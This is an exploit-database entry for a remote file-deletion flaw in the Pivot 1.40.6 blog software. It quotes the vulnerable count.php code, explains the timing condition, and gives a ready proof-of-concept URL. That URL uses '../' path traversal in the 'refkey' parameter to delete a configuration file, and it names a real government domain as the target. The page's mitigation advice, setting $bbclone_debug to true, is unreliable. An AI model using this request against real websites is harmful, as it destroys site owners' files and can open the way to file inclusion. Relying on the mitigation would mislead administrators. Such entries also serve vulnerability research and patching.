header-logo
Suggest Exploit
vendor:
Pivot
by:
Alfons Luja
7.5
CVSS
HIGH
Remote File Delete
20
CWE
Product Name: Pivot
Affected Version From: 1.40.6
Affected Version To: 1.40.6
Patch Exists: NO
Related CWE: N/A
CPE: a:pivot:pivot:1.40.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Pivot 1.40.6 Remote File Delete

A vulnerability exists in Pivot 1.40.6 which allows an attacker to delete files remotely. This is due to the fact that the $bbclone_debug variable is never changed and is always set to false. This allows an attacker to use the 'refkey' parameter in the 'count.php' script to delete files. If the register globals is ON, an attacker can use this bug to include some file.

Mitigation:

Disable register globals and ensure that the $bbclone_debug variable is set to true.
Source

Exploit-DB raw data:

Pivot 1.40.6 Remote File Delete 

Alfons Luja

Vuln :
     
     extensions/bbclone_tools/hr_conf.php line 20

       ...
 
       $bbclone_debug = false;  //is never change 

       ...
 
=========================================================
       
    extensions/bbclone_tools/count.php


      ...


      if ( ($_GET["refkey"]!="") && file_exists("$refkeydir/".$_GET["refkey"])) {   [1]

	if ($bbclone_debug==true) { echo "Refkey found..<br />"; }

	// Getting the time offset between the web and file server (if there is any)
	$offset = timediffwebfile($bbclone_debug);

	if ((time() - filectime("$refkeydir/".$_GET["refkey"])) < (1000+$offset)) {   [2]
         
		include("do_count.php");
		if ($bbclone_debug!=true) {
			header("content-type:image/gif");
			readfile("pixel.gif");
		} else {
			echo "Counted normally";
		}
		die();

	} else if ($bbclone_debug==true) {
		echo "too old!";
	}

	if ($bbclone_debug!=true) {                                                    [3]
		unlink("$refkeydir/".$_GET["refkey"]);
	}
}

      ...


1] . We can put existent file 

2] . Time dependences 
     If current time - last modification time < 1000 + $offset (usually 1001,1002 not more)
     We must wait a moment other way 'exploit dosent work'  

3] . $bbclone_debug is always false so if condition from point [2] == false 
     We can delete some file 
   

If register globals is ON we can using this bug to include some file  

poc :

http://www.pentagon.gov/~pivot_1406_full/extensions/bbclone_tools/count.php?refkey=../../../extensions/bbclone_tools/hr_conf.php

# milw0rm.com [2009-03-18]

Navigation

Suggest Exploit

Services By CQR